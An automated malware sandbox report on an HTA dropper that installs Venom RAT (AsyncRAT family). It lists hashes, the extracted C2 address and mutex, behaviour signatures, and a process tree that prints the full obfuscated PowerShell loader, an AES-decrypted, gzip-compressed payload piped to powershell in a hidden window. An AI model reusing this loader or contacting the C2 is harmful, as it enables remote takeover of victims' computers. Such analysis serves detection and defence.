Analysis

  • max time kernel
    12s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-01-2024 21:28

General

  • Target

    163.5.169.28/SCAN-atoletter5.hta

  • Size

    1.1MB

  • MD5

    415d6911c9a6e92b5d3f050668592357

  • SHA1

    3f5ddfb1475a25201e443c61e31382100e8ddbae

  • SHA256

    87b6bcaa19c9631310bb28100e1ed2c9f2b982fa5aaef48186da150d8d1c4ac3

  • SHA512

    6b322e26c4724efa648713c665d6eddc4f2191d9f3a7764076ae8fc8d5f13fd2301238e7aade65b49db71b0ecadd9333af42cfa7e98ae54b554a99eafc45a055

  • SSDEEP

    1536:zA8mj3XPCeaTTQT7L/1rTrZwsvCPA68WStimr/l1vcmafSIm+lIWFiWCK4vLwwlY:zA8mrfFITQTH/1rTrZ/CPArtQ

Score
10/10

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

C2

5.182.87.154:4449

Mutex

jiqsvporltpvroy

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\SCAN-atoletter5.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3488
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $yZFZU = 'AAAAAAAAAAAAAAAAAAAAABE/loWPunGVG3vSzIF+4gYYuSdi25LjA3R2sRH3ANApHSXuf8bMyC29pivChWpQUF5jwS5PApifdJjbv9vkn9DXSM/2JUYmdCYx5xVByfj6pJkMegF8zwFSo8ZK3if0l/4GDPyqshuCBy2VboNRKWl2p1X2wR5J/tGkqskOVoRV3QhNnczAnEf7CRFM1Is/fdf8XSHRubMBIegNiKhoMT1yK8XvCRkWspIFFLru1FAD1Tg8XS8hfxzJUo+IMPHy+J5oTh+lTZwOZakD7TqP4Xzzik8o63NllXciiYBuevivvXZZr+HcVIgajF1z3oX4UsK+7MGliiTTvOJi1VOFAs78fIyHSsOZILhUXxYy7eZCv6zcnay7/rblIpr37qEjWFrFTxJrDCWp9YtfLzZc7b92SprQ5byOTP7PWUhcfuxubcAZXSaei2P6+m8vsNlMODSdhRkDYjzzdvO4sxrk0K6z/maPnACOkYyHI31Y8T1dYS7bXlq67DvZCqMUKg0rsj57gecSAFYjJEjQWAKcsBsRFffl9H53XWNqeXBuKXZxxa0ynQYXAcFtg9xVpjNBjS2+dkWCgPzYxTbP2CyH+Rq++bYuh6VceUfqx+txd5dRFF66O86UOmD+UADlA493qnFc7E8MNauW7Xe2rE83WcmgDH2dlqTL08iguTVfV5/fdb2BOrX7G2jBgqdD5nYvk3+8CVRlLEshXPMD8nMvXD+kdwOoH2QrJshtBLc71bgjc9yTWJFCQU0kVOUCuFP6VmmNHo2lHZ5qqsXgvDfKKalBncPVo5+5vvLnNCMTeOItEFo/OuvVdc7dryTs3ZI5GPGkyiys6MpgGWIVfP9LPNm3mr6ZHiFETvBOcE0bJsJmPvPeL8rQGUGdZdZ1hbrIzo/8rBWelUO2l4N6Fvh2sSVcyxQeAGRdUNs0c7I+WzywCuWFVtVQyKA3uyPZP9DpQiy2D598sKkcFbMNZQ7wMpZKNLYqysKmEr4OwnHBYs4WhQCGPFPt2RkbwPLeqi25Qw==';$UmUBU = 'THVtZ1BydlRUVHNScG5hU0plckh1cmtOUHlBclZZblo=';$PaMSUA = New-Object 'System.Security.Cryptography.AesManaged';$PaMSUA.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PaMSUA.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PaMSUA.BlockSize = 128;$PaMSUA.KeySize = 256;$PaMSUA.Key = [System.Convert]::FromBase64String($UmUBU);$UiOuV = [System.Convert]::FromBase64String($yZFZU);$GvFGJiWe = $UiOuV[0..15];$PaMSUA.IV = $GvFGJiWe;$JMerDVEst = $PaMSUA.CreateDecryptor();$LmLcRliha = $JMerDVEst.TransformFinalBlock($UiOuV, 16, $UiOuV.Length - 16);$PaMSUA.Dispose();$nJoMQCa = New-Object System.IO.MemoryStream( , $LmLcRliha );$QIpvRfP = New-Object System.IO.MemoryStream;$sWecTZomO = New-Object System.IO.Compression.GzipStream $nJoMQCa, ([IO.Compression.CompressionMode]::Decompress);$sWecTZomO.CopyTo( $QIpvRfP );$sWecTZomO.Close();$nJoMQCa.Close();[byte[]] $XhBgIX = $QIpvRfP.ToArray();$oKWZi = [System.Text.Encoding]::UTF8.GetString($XhBgIX);$oKWZi | powershell - }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1628
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $yZFZU = 'AAAAAAAAAAAAAAAAAAAAABE/loWPunGVG3vSzIF+4gYYuSdi25LjA3R2sRH3ANApHSXuf8bMyC29pivChWpQUF5jwS5PApifdJjbv9vkn9DXSM/2JUYmdCYx5xVByfj6pJkMegF8zwFSo8ZK3if0l/4GDPyqshuCBy2VboNRKWl2p1X2wR5J/tGkqskOVoRV3QhNnczAnEf7CRFM1Is/fdf8XSHRubMBIegNiKhoMT1yK8XvCRkWspIFFLru1FAD1Tg8XS8hfxzJUo+IMPHy+J5oTh+lTZwOZakD7TqP4Xzzik8o63NllXciiYBuevivvXZZr+HcVIgajF1z3oX4UsK+7MGliiTTvOJi1VOFAs78fIyHSsOZILhUXxYy7eZCv6zcnay7/rblIpr37qEjWFrFTxJrDCWp9YtfLzZc7b92SprQ5byOTP7PWUhcfuxubcAZXSaei2P6+m8vsNlMODSdhRkDYjzzdvO4sxrk0K6z/maPnACOkYyHI31Y8T1dYS7bXlq67DvZCqMUKg0rsj57gecSAFYjJEjQWAKcsBsRFffl9H53XWNqeXBuKXZxxa0ynQYXAcFtg9xVpjNBjS2+dkWCgPzYxTbP2CyH+Rq++bYuh6VceUfqx+txd5dRFF66O86UOmD+UADlA493qnFc7E8MNauW7Xe2rE83WcmgDH2dlqTL08iguTVfV5/fdb2BOrX7G2jBgqdD5nYvk3+8CVRlLEshXPMD8nMvXD+kdwOoH2QrJshtBLc71bgjc9yTWJFCQU0kVOUCuFP6VmmNHo2lHZ5qqsXgvDfKKalBncPVo5+5vvLnNCMTeOItEFo/OuvVdc7dryTs3ZI5GPGkyiys6MpgGWIVfP9LPNm3mr6ZHiFETvBOcE0bJsJmPvPeL8rQGUGdZdZ1hbrIzo/8rBWelUO2l4N6Fvh2sSVcyxQeAGRdUNs0c7I+WzywCuWFVtVQyKA3uyPZP9DpQiy2D598sKkcFbMNZQ7wMpZKNLYqysKmEr4OwnHBYs4WhQCGPFPt2RkbwPLeqi25Qw==';$UmUBU = 'THVtZ1BydlRUVHNScG5hU0plckh1cmtOUHlBclZZblo=';$PaMSUA = New-Object 'System.Security.Cryptography.AesManaged';$PaMSUA.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PaMSUA.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PaMSUA.BlockSize = 128;$PaMSUA.KeySize = 256;$PaMSUA.Key = [System.Convert]::FromBase64String($UmUBU);$UiOuV = [System.Convert]::FromBase64String($yZFZU);$GvFGJiWe = $UiOuV[0..15];$PaMSUA.IV = $GvFGJiWe;$JMerDVEst = $PaMSUA.CreateDecryptor();$LmLcRliha = $JMerDVEst.TransformFinalBlock($UiOuV, 16, $UiOuV.Length - 16);$PaMSUA.Dispose();$nJoMQCa = New-Object System.IO.MemoryStream( , $LmLcRliha );$QIpvRfP = New-Object System.IO.MemoryStream;$sWecTZomO = New-Object System.IO.Compression.GzipStream $nJoMQCa, ([IO.Compression.CompressionMode]::Decompress);$sWecTZomO.CopyTo( $QIpvRfP );$sWecTZomO.Close();$nJoMQCa.Close();[byte[]] $XhBgIX = $QIpvRfP.ToArray();$oKWZi = [System.Text.Encoding]::UTF8.GetString($XhBgIX);$oKWZi | powershell -
        3⤵
          PID:1444
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      1⤵
        PID:3464
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\SCAN-atoletter5.pdf"
          2⤵
            PID:3588
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
              3⤵
                PID:4704
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=07748823BD5D778384453806FBB0BA60 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=07748823BD5D778384453806FBB0BA60 --renderer-client-id=2 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job /prefetch:1
                  4⤵
                    PID:2092
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=036C4AC04809167F6F4D875F0A123E5C --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    4⤵
                      PID:4904
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=977CBCE07E3FF1B6183BDA0B0871AFEF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=977CBCE07E3FF1B6183BDA0B0871AFEF --renderer-client-id=4 --mojo-platform-channel-handle=2160 --allow-no-sandbox-job /prefetch:1
                      4⤵
                        PID:1868
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F59B6AEC370137E63E8FE001BE6A5B54 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        4⤵
                          PID:2596
                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3CEDF23A7587B578A79CAC5E7E12B700 --mojo-platform-channel-handle=2568 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                          4⤵
                            PID:3464
                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=669A3A96E1CA2888D802B79ADC029C43 --mojo-platform-channel-handle=1964 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                            4⤵
                              PID:60
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe $yZFZU = 'AAAAAAAAAAAAAAAAAAAAABE/loWPunGVG3vSzIF+4gYYuSdi25LjA3R2sRH3ANApHSXuf8bMyC29pivChWpQUF5jwS5PApifdJjbv9vkn9DXSM/2JUYmdCYx5xVByfj6pJkMegF8zwFSo8ZK3if0l/4GDPyqshuCBy2VboNRKWl2p1X2wR5J/tGkqskOVoRV3QhNnczAnEf7CRFM1Is/fdf8XSHRubMBIegNiKhoMT1yK8XvCRkWspIFFLru1FAD1Tg8XS8hfxzJUo+IMPHy+J5oTh+lTZwOZakD7TqP4Xzzik8o63NllXciiYBuevivvXZZr+HcVIgajF1z3oX4UsK+7MGliiTTvOJi1VOFAs78fIyHSsOZILhUXxYy7eZCv6zcnay7/rblIpr37qEjWFrFTxJrDCWp9YtfLzZc7b92SprQ5byOTP7PWUhcfuxubcAZXSaei2P6+m8vsNlMODSdhRkDYjzzdvO4sxrk0K6z/maPnACOkYyHI31Y8T1dYS7bXlq67DvZCqMUKg0rsj57gecSAFYjJEjQWAKcsBsRFffl9H53XWNqeXBuKXZxxa0ynQYXAcFtg9xVpjNBjS2+dkWCgPzYxTbP2CyH+Rq++bYuh6VceUfqx+txd5dRFF66O86UOmD+UADlA493qnFc7E8MNauW7Xe2rE83WcmgDH2dlqTL08iguTVfV5/fdb2BOrX7G2jBgqdD5nYvk3+8CVRlLEshXPMD8nMvXD+kdwOoH2QrJshtBLc71bgjc9yTWJFCQU0kVOUCuFP6VmmNHo2lHZ5qqsXgvDfKKalBncPVo5+5vvLnNCMTeOItEFo/OuvVdc7dryTs3ZI5GPGkyiys6MpgGWIVfP9LPNm3mr6ZHiFETvBOcE0bJsJmPvPeL8rQGUGdZdZ1hbrIzo/8rBWelUO2l4N6Fvh2sSVcyxQeAGRdUNs0c7I+WzywCuWFVtVQyKA3uyPZP9DpQiy2D598sKkcFbMNZQ7wMpZKNLYqysKmEr4OwnHBYs4WhQCGPFPt2RkbwPLeqi25Qw==';$UmUBU = 'THVtZ1BydlRUVHNScG5hU0plckh1cmtOUHlBclZZblo=';$PaMSUA = New-Object 'System.Security.Cryptography.AesManaged';$PaMSUA.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PaMSUA.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PaMSUA.BlockSize = 128;$PaMSUA.KeySize = 256;$PaMSUA.Key = [System.Convert]::FromBase64String($UmUBU);$UiOuV = [System.Convert]::FromBase64String($yZFZU);$GvFGJiWe = $UiOuV[0..15];$PaMSUA.IV = $GvFGJiWe;$JMerDVEst = $PaMSUA.CreateDecryptor();$LmLcRliha = $JMerDVEst.TransformFinalBlock($UiOuV, 16, $UiOuV.Length - 16);$PaMSUA.Dispose();$nJoMQCa = New-Object System.IO.MemoryStream( , $LmLcRliha );$QIpvRfP = New-Object System.IO.MemoryStream;$sWecTZomO = New-Object System.IO.Compression.GzipStream $nJoMQCa, ([IO.Compression.CompressionMode]::Decompress);$sWecTZomO.CopyTo( $QIpvRfP );$sWecTZomO.Close();$nJoMQCa.Close();[byte[]] $XhBgIX = $QIpvRfP.ToArray();$oKWZi = [System.Text.Encoding]::UTF8.GetString($XhBgIX);$oKWZi
                        1⤵
                          PID:4728
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1444
                        • C:\Users\Admin\AppData\Roaming\fd1.exe
                          C:\Users\Admin\AppData\Roaming\fd1.exe
                          1⤵
                            PID:3196
                            • C:\Users\Admin\AppData\Roaming\fd1.exe
                              C:\Users\Admin\AppData\Roaming\fd1.exe
                              2⤵
                                PID:5748

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                              Filesize

                              36KB

                              MD5

                              b30d3becc8731792523d599d949e63f5

                              SHA1

                              19350257e42d7aee17fb3bf139a9d3adb330fad4

                              SHA256

                              b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                              SHA512

                              523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

                            • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                              Filesize

                              56KB

                              MD5

                              752a1f26b18748311b691c7d8fc20633

                              SHA1

                              c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                              SHA256

                              111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                              SHA512

                              a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                            • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                              Filesize

                              64KB

                              MD5

                              d985214b5bfc573421cb6c05973acd0e

                              SHA1

                              825a630d5551d5af292c33f077c6299b661d725a

                              SHA256

                              00f97c7d7b529d384096264afac495ab7e2f38c823354035956446dee484f877

                              SHA512

                              9f2f3805f895f6add75950f5ba65e1c2bfe6143bc0a42be7b4d37c4ea750c941ebf58f0bc563115c509972e8c60538ae480df2c14114cd5633a9846bd5fa0ab0

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fd1.exe.log

                              Filesize

                              1KB

                              MD5

                              9f5d0107d96d176b1ffcd5c7e7a42dc9

                              SHA1

                              de83788e2f18629555c42a3e6fada12f70457141

                              SHA256

                              d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097

                              SHA512

                              86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                              Filesize

                              1KB

                              MD5

                              def65711d78669d7f8e69313be4acf2e

                              SHA1

                              6522ebf1de09eeb981e270bd95114bc69a49cda6

                              SHA256

                              aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

                              SHA512

                              05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              15KB

                              MD5

                              798dab2a24780f528dad98bda99ebba9

                              SHA1

                              3257d77a398c666ac65c900c317869b2976c5015

                              SHA256

                              8f056baf6016dacbb594ee6f39424b0b634531fb6b919f7459a65dc78d4f122d

                              SHA512

                              47db162cf13c19a9ce5f8457f72e6d6529db04583c34a82c18310f6f0a4a098ab7d9cae3f8f52ba24dfd79dbf263f342318207a61a7c7e588a836e0c3bbd5950

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v5uyhtle.lnz.ps1

                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            • C:\Users\Admin\AppData\Roaming\fd1.exe

                              Filesize

                              1KB

                              MD5

                              f04ac35881166aac6c1999826e99fdb6

                              SHA1

                              6711841bed83fb9ca28daa158d1c7b61dfdcc699

                              SHA256

                              17a0bd2e790a9b7ca4ed6a146ea6676716a09cfc437893f4817d1befb09978c2

                              SHA512

                              60f004e7cede3a4134fa88e597c84462ebfd195b768ae5519d21f860207e2038fab2ed510fb89d2bdee9f6384d57c1c0a467f1a607227e45385e220bdd669dc2

                            • C:\Users\Admin\AppData\Roaming\fd1.exe

                              Filesize

                              22KB

                              MD5

                              48981bddc72a78b3a80b8fdd7b2d05f9

                              SHA1

                              e08307aa2b5d898dd9dbaff43a664b87cb8ed158

                              SHA256

                              85349f8eedc2c9f43a2f9e5301f6244546656bc1bbdaba6edfefd477a112d973

                              SHA512

                              07aad200bc7c13e428e77a913f764ce196ad29e1a0a0a270a788c4b2b6d4d804ceeb1cacd663db2ef01188671e9828c69e1d9ed53c74a78ab4fba8a0c1103c96

                            • C:\Users\Admin\AppData\Roaming\fd1.exe

                              Filesize

                              9KB

                              MD5

                              f0bb709aae707fa00d99f202b6936f44

                              SHA1

                              4bc4092dc166eb67552aa86aeaa76a2d6ed7926c

                              SHA256

                              4ee53f57e790f533f70dbc1a551e270ac554d18826e9d5cefbbe049fe8ab810f

                              SHA512

                              f4f0a0234c7db870439b10ca76aacebf42fda91d76130bf7d1c46eb0c913b58176e1a5b2dde94d7a9181f0588858db008ad8f4e8165ca51db3db6be6f211d6a7

                            • C:\Users\Admin\SCAN-atoletter5.pdf

                              Filesize

                              169KB

                              MD5

                              c5de2a211a2580c04d1b5349651d3e4a

                              SHA1

                              81a25e710c7dc63b10220dbdf39dc48ff11da5f3

                              SHA256

                              57b4117e2cf9ab76ed554c2bbf192b9868b94202ad5aaff05a593cf3d4630f85

                              SHA512

                              ad3fead8c0e7820e008bdd9f90b443a20eab0dde9d51a1035e8b40f070d7e381e641a8ae00911bc8c0a4a8e341a9a73e3ee133b78abddbbb442f00ce28efd51d

                            • memory/1628-28-0x0000000070D90000-0x0000000071540000-memory.dmp

                              Filesize

                              7.7MB

                            • memory/1628-24-0x0000000007460000-0x0000000007A04000-memory.dmp

                              Filesize

                              5.6MB

                            • memory/1628-7-0x0000000005730000-0x0000000005796000-memory.dmp

                              Filesize

                              408KB

                            • memory/1628-22-0x0000000006380000-0x000000000639A000-memory.dmp

                              Filesize

                              104KB

                            • memory/1628-6-0x00000000056C0000-0x0000000005726000-memory.dmp

                              Filesize

                              408KB

